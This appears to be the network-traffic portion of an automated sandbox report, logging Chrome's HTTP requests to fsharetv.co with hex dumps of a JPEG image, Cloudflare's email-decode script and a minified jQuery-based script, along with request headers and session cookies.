                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 be 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 00 02 02 03 01 01 01 00 00 00 00 00 00 00 00 00 05 06 04 07 00 03 08 02 01 09 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 00 01 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e3 2c cf b2 7c cc c9 33 33 24 c3 03 99
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"5,|33$
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: b5 34 ad b3 61 55 12 30 c8 19 6f 85 27 52 d6 9d 0a 61 be 5f 8d 39 76 a7 2f d9 88 a2 f0 c6 04 6a 24 c5 3a 03 ed 03 e9 ca a8 a1 85 c1 f6 b4 1d 17 63 ca af 2d 53 b1 3d 5b 45 51 8b 2f d2 79 ff 00 93 6e 68 67 e9 b5 49 1a 06 b5 ec d6 a9 55 90 74 20 84 25 72 06 9a d2 d4 e8 d5 3f f3 8d 99 f2 e1 2b 40 d9 12 c6 62 d4 e5 d8 e2 37 73 16 da 47 1c b0 54 b9 ea f6 e4 3c 05 2b d2 cb 6d 0a 24 0d 9a 89 cb eb ae 48 fa 1c 62 4b 84 b3 54 72 29 5e 8e a1 ae 86 cb d3 3e 5f 8b b9 92 ea 6a 16 79 61 75 25 05 eb ce 64 66 66 64 9e fa 53 9a 3e c9 6e 2e 2e 96 3a 01 d5 dc cd d2 dd 3e 4f 4c 54 f3 85 e2 df f4 33 2d 85 8b a3 43 23 be a3 bf 2c fb f3 90 ba 8f 7f 2c e6 45 19 b3 9b b2 99 7c 5d c3 d3 2c 8b 09 d1 3a 15 f7 6f f2 8d a0 e7 0c 60 a4 ba 26 41 1f 2a d5 e4 de 97 e7 f8 61 6e 54 5b 85 c2
                                                                                                                                                                                          Data Ascii: 4aU0o'Ra_9v/j$:c-S=[EQ/ynhgIUt %r?+@b7sGT<+m$HbKTr)^>_jyau%dffdS>n..:>OLT3-C#,,E|],:o`&A*anT[
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: 5d 3b 73 de b4 ae 74 bf e8 ad 9e 78 69 61 37 1d e4 73 4d 5d 65 c7 d5 12 c1 e8 f0 e9 da 24 9d 61 79 ed fd bb 6a 04 ea b5 fc 51 de b4 72 ae b7 1a 22 e0 4f 5e 6e a5 d1 60 76 1d 55 08 ad 9d 12 ce a3 65 f5 3c ad c4 8f 5c de 78 ba 3a 6b a7 56 1b d4 c9 c8 9d 1f 06 0c dd 01 e8 05 ec e9 32 b4 5d f4 cc 4b 61 9e a2 af ab b1 5d 22 b4 67 37 cf 5a f2 57 51 bc 14 e9 fb 62 ba d1 ca 53 2a 2b 22 8b 4c f9 67 a7 44 f7 14 cd 9c df 49 ba ba b1 90 75 73 ad 45 3a 9d d0 42 ce a5 c5 af bb 25 c0 ef 40 74 88 6f ad dd ab a6 04 b2 c6 a1 5d 20 92 69 df 32 a2 f4 78 b6 ab ef 36 de 59 7a 2c ee b5 43 6e 5e b9 3a b1 97 9e 74 60 f1 99 9b 38 d8 ea 95 22 4e ba e3 db ae 94 4e bc cc d8 ec 9f 3a ff 00 90 2c 90 72 b6 81 9b 58 a8 39 99 55 9f 7e 64 8d 33 92 30 1a c2 bd 98 4b cc cc ba cc cc 93 0f 80
                                                                                                                                                                                          Data Ascii: ];stxia7sM]e$ayjQr"O^n`vUe<\x:kV2]Ka]"g7ZWQbS*+"LgDIusE:B%@to] i2x6Yz,Cn^:t`8"NN:,rX9U~d30K
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: c0 1e 3a 46 33 b3 ec 43 2c 3c be 17 c9 11 cc 41 e0 eb 1d 74 65 df 82 cb c7 d3 63 a5 43 fd 97 f9 9a 3e 0c b9 b9 31 f5 d4 10 4f ea 72 9b 81 79 19 c7 f7 a7 e2 a6 65 78 e2 25 75 9b 22 61 29 d3 c1 86 cf b5 8f 80 7f ab 3a 70 da 4b 31 c6 88 96 62 f1 62 43 63 9b 40 45 af a6 93 f9 75 1c 11 4a 6d 65 2b c9 80 38 f5 00 23 a0 03 c6 35 1d d7 ae 66 59 dc 73 2d 68 07 ba 59 ed f3 37 35 35 3e 61 80 42 3c 4d 43 2b 1e 20 1b fd e2 d6 11 9c bf c8 0f 4b 4a 6e 26 b5 98 b5 e8 6c 99 69 d7 99 9b 61 82 f2 df 38 76 03 a8 9e 66 66 3f 35 20 dc 9c 09 13 1f c3 09 47 c4 61 2a fb 34 97 96 92 67 6e 70 f3 0d 5b d8 96 a6 a0 9f 30 42 22 8f d9 50 d7 99 ad fe c0 37 e8 a3 64 4e 08 aa d1 7a 70 76 96 d2 09 f3 5d 20 71 9a f4 b0 47 c7 ee 18 d8 68 26 15 6b cf 8c b4 8a fc c3 90 8c b3 2b 56 d8 da 5a e5
                                                                                                                                                                                          Data Ascii: :F3C,<AtecC>1Oryex%u"a):pK1bbCc@EuJme+8#5fYs-hY755>aB<MC+ KJn&lia8vff?5 Ga*4gnp[0B"P7dNzpv] qGh&k+VZ
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: 47 4d 6c 75 e7 19 7f cc 6c 23 70 63 1f a4 81 5f 20 16 05 9a e4 22 09 8f d1 1f c7 3c ce c6 15 61 9b 33 ab dd 90 c7 f6 ef 53 0b ad 6d 7b 77 59 90 79 1d 3d e5 be 5c f2 33 11 05 4a 04 ba 94 be 8e 2d 8d 88 b8 cd cd 2e a1 58 f2 37 f4 0e 66 67 74 1a f1 e8 67 5e 94 7b 95 e4 63 4e 97 9e ec dd ab 37 35 e9 91 f8 99 8b b0 f2 fb f8 47 72 60 3e 98 37 8a f7 ca fe a1 63 cf aa cc 3f 14 e7 3a ef 9b 64 96 a7 8c 5f 4a 87 ba 74 ee 9b c7 8d b6 66 65 26 1b 2b 37 50 b1 9e d6 df ef ac c5 1c 88 8a 3d e2 0d cc 3c 8e 3e c8 ec 6a 6f bb 65 65 08 98 d7 b5 80 a9 eb b6 de 3d 87 a5 60 dc ad de 3d 3c fd d0 d1 1b 73 94 36 47 bb 7b 12 8f 1b 99 0f c8 cc 4a c3 a9 dd 89 db 3a f4 e9 6c 9a 26 75 32 80 02 6a b3 da 21 b7 57 f8 b9 b8 0d c2 7d c6 71 9d 33 03 bd f7 5a ac f0 6d 73 3a cb 5b 61 0c fe b5
                                                                                                                                                                                          Data Ascii: GMlul#pc_ "<a3Sm{wYy=\3J-.X7fgtg^{cN75Gr`>7c?:d_Jtfe&+7P=<>joee=`=<s6G{J:l&u2j!W}q3Zms:[a
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: 58 fc 9a 31 e5 ed 35 da 47 b4 bd 46 bf 7a 57 70 71 b9 45 7d 9e 5a ba 95 bb 4d 33 17 b9 59 1e a2 19 44 5f ea 53 8a 6f ad b7 c6 b5 f6 cc 24 db cf a4 73 ca 2e 23 81 b9 f4 b6 4f a3 b6 7d 2d 90 62 bc ea 59 2a 07 13 eb 8d f9 88 97 eb 51 b2 3b 96 4c 9b cf 89 43 72 1a 3d b8 69 e5 35 2c 6d 2c e8 09 cf 25 9e 66 59 e3 d0 cb d3 97 b9 70 f2 b9 ae e1 01 fe 02 f1 8c c0 19 61 f1 2f 1a 73 e9 b9 be 5a 98 f5 99 4a ec f0 99 3f 6d 74 2b 5e 23 6d 5b 84 b0 b2 d5 9c 59 23 f5 07 5d c1 d4 9b 53 f5 8b 0f 89 6f 52 77 d8 8b d5 1c 09 9c ca c1 7f 66 27 e7 3e 66 28 1c 0c 61 f7 fc d2 ba 9a 10 c7 99 d6 f1 4f 1f f4 f0 e3 5d ad 33 32 3c ea 26 62 6b db dc e5 3c 98 13 b7 73 ac aa c2 27 28 f1 da 65 8f ee 6b d1 6a 1a f3 8d ae 24 4a 30 fb 1c 98 da dd d3 2c 27 51 f2 38 06 13 1e d2 78 d7 32 9f 93
                                                                                                                                                                                          Data Ascii: X15GFzWpqE}ZM3YD_So$s.#O}-bY*Q;LCr=i5,m,%fYpa/sZJ?mt+^#m[Y#]SoRwf'>f(aO]32<&bk<s'(ekj$J0,'Q8x2
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: 9c c0 74 77 2d af 13 25 cb 35 38 38 d8 a5 ed 5b 2c 6c 9b 09 9d 52 f1 ed a1 7a 86 be c8 1d 40 eb 1a 95 3e 94 54 6e 60 a1 55 5b dc 6e a9 f2 0f bf e8 aa 98 b8 cb 45 a8 e0 00 c9 c0 37 4b a8 7c 26 5a a0 00 fd 6d 7b db 78 cb 3b 22 cc 3a 19 26 46 33 9b 6c e2 cd 6d 3e 6e bb 86 47 19 76 03 7d 3b a0 ed ab 9a 79 df d3 72 32 6c 67 2e 85 09 53 85 86 d9 6f c5 72 5e 9c 70 a8 71 5d ba 85 a1 5b aa db f5 38 dc e7 43 af 9e 55 72 ec 81 d8 ef 92 5f 21 e5 c0 63 d6 b8 c8 6a ad 7e db d4 d6 63 3e a6 36 27 d3 e6 29 5c 5a bb b6 aa 11 93 65 af da c6 b7 ed af 61 2f bb e8 94 8f 4b 8f 3a f1 9e 75 9f 9a 20 03 d3 1e b5 a2 ae 6e 7a 95 9b f1 8b 92 32 5c 23 db 5d 69 a9 89 45 36 92 0b 3f 8f b0 3a 85 8c c3 96 63 1f 91 fa 99 5f c2 dc bb b2 3c 4b 30 2e a9 3b 8d d3 f9 e5 5c 81 eb b4 5e 2e 2f 66
                                                                                                                                                                                          Data Ascii: tw-%588[,lRz@>Tn`U[nE7K|&Zm{x;":&F3lm>nGv};yr2lg.Sor^pq][8CUr_!cj~c>6')\Zea/K:u nz2\#]iE6?:c_<K0.;\^./f
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: 80 a0 47 c9 63 b1 cb 76 c5 28 ae 9d 10 25 cd 5d 74 f9 63 62 07 c8 78 ce 0a 48 ee 36 6b 49 c2 02 94 6e 40 19 32 5c a4 92 2b 56 0c f3 15 0f 0b 23 15 62 ad 45 0e 79 0a 76 a5 fa ae c3 60 e3 07 b6 5d 5b 26 83 62 ad 6f 4c 4f 95 9e 7f 2a f2 c9 bb 9c 88 71 80 01 af 23 63 15 8c d5 ba 2a 2e cc ce ac c7 3f a7 82 c0 d3 f4 82 39 06 c7 41 90 58 f8 c8 ad 8a b6 69 ae ce 78 0e 18 53 65 78 3b ad 2c 81 bd 0a 32 10 0e 01 51 58 61 46 65 52 45 79 86 71 4b 2a ec 30 2e 16 9a 6c d3 48 8b 4b d4 01 e2 a4 92 30 32 24 8b 6f 52 a7 8f 92 f1 ea 99 21 8a d1 97 23 25 64 db fc 56 30 07 12 a9 68 d9 52 0e 9f 3a c6 e9 23 f4 d9 8a 85 0f d3 e5 6d 69 ac e7 3b 00 2d ee 01 35 e2 9b 20 d1 82 6e 2b 6a 69 89 ff 00 2f 94 a3 d2 cd b0 e0 b8 a9 65 47 5d 18 b7 25 0f 82 41 c9 10 bb 1d 54 05 8b 8a 8e 6c f6
                                                                                                                                                                                          Data Ascii: Gcv(%]tcbxH6kIn@2\+V#bEyv`][&boLO*q#c*.?9AXixSex;,2QXaFeREyqK*0.lHK02$oR!#%dV0hR:#mi;-5 n+ji/eG]%ATl
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: f6 c7 d5 5d 93 d8 6c 44 4e 79 93 ff 00 8b c9 18 be 72 6d 9e 90 e0 56 e6 a6 4d c3 69 9f 4c 89 61 92 4a 5d 25 c2 c7 24 61 70 00 e9 9e 8d 70 15 49 11 5d 17 f7 52 aa ca bb d1 b8 28 2a ef fd 27 06 e7 66 41 ef 02 bb 8c 4d ed 8d d8 66 b6 21 40 ac f1 5b f1 ee f2 5f f8 f2 aa c2 31 12 0e b3 4e e8 03 25 b5 c0 b8 c9 6b ab 81 0a 6d 4b 44 26 35 34 29 f6 83 94 68 f2 41 a3 18 61 86 36 91 37 b3 a7 44 6b b1 1a 9a 44 42 31 5d b4 a6 52 be c2 31 e2 a4 b6 8c c6 c2 55 1e 23 66 49 f4 f1 b9 1e 3f 70 ac fd b9 65 ba 45 63 da 79 da 68 52 43 0d f4 e9 e0 91 17 64 05 fc b7 70 5d bf 48 49 ce e2 6a 49 f9 da 16 3e 01 3d 08 cf 4d 54 96 58 d0 58 5f c5 34 7c 98 97 82 8c 05 5e d9 86 6e e0 11 16 3b 6a de d9 e3 81 d5 d0 2d b4 21 dd 5d 59 43 29 c0 7a 05 7c aa 3c 60 e2 57 23 c4 18 da 36 43 d0 63
                                                                                                                                                                                          Data Ascii: ]lDNyrmVMiLaJ]%$appI]R(*'fAMf!@[_1N%kmKD&54)hAa67DkDB1]R1U#fI?peEcyhRCdp]HIjI>=MTXX_4|^n;j-!]YC)z|<`W#6Cc
                                                                                                                                                                                          2024-12-15 11:37:53 UTC1378INData Raw: 72 ab 30 09 6a a5 d9 1e 68 49 a1 d0 cd fa ac dd 31 12 69 e6 53 32 b8 bb 58 98 05 20 08 8a 7b c8 8f 65 ad 80 42 1d 19 0f 15 ff 00 24 37 83 70 d9 f4 be 67 19 0f 00 b6 8c 20 99 1a bd 00 1b b3 da 37 2f 2a ae f3 9e 77 7b 23 d5 79 75 66 13 aa e9 67 06 74 3c 22 9b 0d 04 66 e3 e0 9e d8 be 64 d0 00 9f 18 80 32 b6 89 e0 37 65 f3 53 c9 0c cd f9 a8 4a da b9 d1 ee 35 0c b9 dd 48 ce 57 46 f1 e7 40 17 4c 7d 9c 22 65 35 b7 22 0d 1d 16 a0 65 3c ce a9 55 7d 65 a2 7f 49 d5 45 ce 71 b2 d8 0e 73 2a eb 64 0f df 74 d4 cb 4c 5c 00 82 e8 b1 b9 cc ee e2 8c 72 30 6e 52 eb b2 dd cd 7a a7 40 6a 4a 99 0e a8 a4 11 e9 0b 00 65 cd 0e 9e d2 31 2b 6b 17 f0 12 55 60 97 8a 73 44 01 bc d4 69 28 2d 90 99 32 75 64 84 25 d1 e0 83 9d 0f 94 4c c7 55 1c 81 d0 6b 45 4a 9e 5d 8d ed 99 6c fe d2 03 90
                                                                                                                                                                                          Data Ascii: r0jhI1iS2X {eB$7pg 7/*w{#yufgt<"fd27eSJ5HWF@L}"e5"e<U}eIEqs*dtL\r0nRz@jJe1+kU`sDi(-2ud%LUkEJ]l


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.1649716104.21.10.1584436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:53 UTC960OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:37:54 UTC758INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:54 GMT
                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                          Content-Length: 1239
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Last-Modified: Fri, 06 Dec 2024 15:31:09 GMT
                                                                                                                                                                                          ETag: "675318bd-4d7"
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FCiZkJt6RIT8R4%2Bc3yBsOdOtqGXgfXJnP6spZIy9O%2FK%2FiEs0PqckaaMx9AUSi07S%2Fhxz0TgKtcWi6gtCKYWE%2BhaNuRFBpgnt3TD5NFO47XxDRfD%2B%2F23hF7ixjn2Ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2624f07fb6434f-EWR
                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          Expires: Tue, 17 Dec 2024 11:37:54 GMT
                                                                                                                                                                                          Cache-Control: max-age=172800
                                                                                                                                                                                          Cache-Control: public
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          2024-12-15 11:37:54 UTC611INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                                                                                                                                          Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                                                                                                                                          2024-12-15 11:37:54 UTC628INData Raw: 28 6f 2e 68 72 65 66 2c 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61
                                                                                                                                                                                          Data Ascii: (o.href,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(va


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          5192.168.2.1649717104.21.10.1584436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:37:54 UTC924OUTGET /js/disk.js?t=1589873325348 HTTP/1.1
                                                                                                                                                                                          Host: fsharetv.co
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          Cookie: wordpress-session=34f79ef2d2feacaff745d8f4e2d6bbfdsngS1BW0R2o90J1n6Wux%2B69DC%2F692EMJW1dZZeSIycxkceDS2q72gEXBHl0huU3Ouo62GAL8E4BqYdJdiAhHoME76BqDdNegDGM2JpZRcnKESouvC5sr9klmtikFTm9U; wordpress-session-values=7b129713a0d9f95787e394038040f843%2Bu2jfqgneMUQXS8X%2BX2CwlkyKGeUT4zL4PHvAvbDH%2BgWpmH0xfFdmiO%2B8AO%2F2wKWjjs35E%2F6ZAnTkyUzFOGk5SFWXTwdAEFMgtSYZJOV9ajJxUZBu6jDbYsOxfaqmdXV
                                                                                                                                                                                          2024-12-15 11:37:55 UTC937INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:37:54 GMT
                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                          Content-Length: 786922
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Cache-Control: public, max-age=1800
                                                                                                                                                                                          Last-Modified: Sat, 14 Sep 2024 03:24:17 GMT
                                                                                                                                                                                          ETag: W/"c01ea-191ee8f5868"
                                                                                                                                                                                          CF-Cache-Status: REVALIDATED
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X04em6AFJWmTY1B18iJgLAWjui6xbOgN9tc0l0jo3mK%2Bz%2BXuS%2B%2BNdzSvS4xz22cSWSquL%2FTsx2kfnW5bYp3vssmKikcASVjYjFtR5eBBvcrh1rI0VXWppEnJwZ20Tw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                          CF-RAY: 8f2624f49e895e70-EWR
                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1559&rtt_var=598&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1502&delivery_rate=1810291&cwnd=228&unsent_bytes=0&cid=cf14d2103ab8e94d&ts=778&x=0"
                                                                                                                                                                                          2024-12-15 11:37:55 UTC432INData Raw: 2f 2a 21 20 64 20 32 30 32 34 2d 30 39 2d 31 34 20 2a 2f 0a 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 6f 63 75 6d 65 6e 74 3f 65 28 74 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64 6f 63 75 6d 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 65 28 74 29 7d 3a 65 28 74 29 7d 28 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                          Data Ascii: /*! d 2024-09-14 */!function(t,e){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=t.document?e(t,!0):function(t){if(!t.document)throw new Error("jQuery requires a window with a document");return e(t)}:e(t)}("undefine
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 2e 63 61 6c 6c 28 74 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 74 29 7d 2c 75 3d 65 2e 70 75 73 68 2c 72 3d 65 2e 69 6e 64 65 78 4f 66 2c 69 3d 7b 7d 2c 73 3d 69 2e 74 6f 53 74 72 69 6e 67 2c 79 3d 69 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 61 3d 79 2e 74 6f 53 74 72 69 6e 67 2c 6c 3d 61 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 76 3d 7b 7d 2c 62 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 22 6e 75 6d 62 65 72 22 21 3d 74 79 70 65 6f 66 20 74 2e 6e 6f 64 65 54 79 70 65 7d 2c 77 3d 6b 2e 64 6f 63 75 6d 65 6e 74 2c 63 3d 7b 74 79 70 65 3a 21 30 2c 73 72 63 3a 21 30 2c 6e 6f 6e 63 65 3a 21 30 2c
                                                                                                                                                                                          Data Ascii: .call(t)}:function(t){return e.concat.apply([],t)},u=e.push,r=e.indexOf,i={},s=i.toString,y=i.hasOwnProperty,a=y.toString,l=a.call(Object),v={},b=function(t){return"function"==typeof t&&"number"!=typeof t.nodeType},w=k.document,c={type:!0,src:!0,nonce:!0,
                                                                                                                                                                                          2024-12-15 11:37:55 UTC1369INData Raw: 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 43 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 65 25 32 7d 29 29 7d 2c 65 71 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 74 3d 2b 74 2b 28 74 3c 30 3f 65 3a 30 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 30 3c 3d 74 26 26 74 3c 65 3f 5b 74 68 69 73 5b 74 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 75 2c 73 6f 72 74 3a 65 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 65 2e 73 70 6c 69 63 65
